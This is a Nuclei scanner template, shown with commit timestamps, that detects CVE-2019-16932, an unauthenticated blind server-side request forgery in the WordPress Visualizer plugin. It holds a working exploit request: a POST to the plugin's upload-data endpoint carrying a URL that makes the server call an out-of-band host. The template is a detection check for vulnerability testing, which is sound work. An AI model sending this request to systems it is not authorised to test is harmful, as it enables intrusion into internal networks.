nuclei-templates/cves/2019/CVE-2019-16932.yaml

49 lines
1.3 KiB
YAML
Raw Normal View History

2022-05-10 20:17:40 +00:00
id: CVE-2019-16932
info:
name: Visualizer <3.3.1 - Blind Server-Side Request Forgery
2022-05-10 20:17:40 +00:00
author: akincibor
severity: critical
2022-05-10 20:17:40 +00:00
description: |
Visualizer prior to 3.3.1 suffers from a blind server-side request forgery vulnerability via the /wp-json/visualizer/v1/upload-data endpoint.
2022-05-10 20:17:40 +00:00
reference:
- https://wpscan.com/vulnerability/9892
- https://nathandavison.com/blog/wordpress-visualizer-plugin-xss-and-ssrf
- https://nvd.nist.gov/vuln/detail/CVE-2019-16932
- https://wordpress.org/plugins/visualizer/#developers
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N
cvss-score: 10
cve-id: CVE-2019-16932
cwe-id: CWE-918
2022-05-12 14:22:58 +00:00
tags: cve,cve2019,wp-plugin,ssrf,wordpress,xss,unauth
2022-05-10 20:17:40 +00:00
requests:
- method: POST
path:
- '{{BaseURL}}/wp-json/visualizer/v1/upload-data'
2022-05-12 14:21:26 +00:00
2022-05-23 11:54:34 +00:00
body: '{\"url\":\"http://{{interactsh-url}}\"}'
2022-05-10 20:17:40 +00:00
headers:
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
2022-05-23 11:54:34 +00:00
- type: word
part: interactsh_protocol
name: http
words:
- "http"
2022-05-23 11:56:35 +00:00
2022-05-23 11:54:34 +00:00
- type: word
part: header
words:
- "application/json"
2022-05-10 20:17:40 +00:00
- type: status
status:
- 200
# Enhanced by mp on 2022/05/27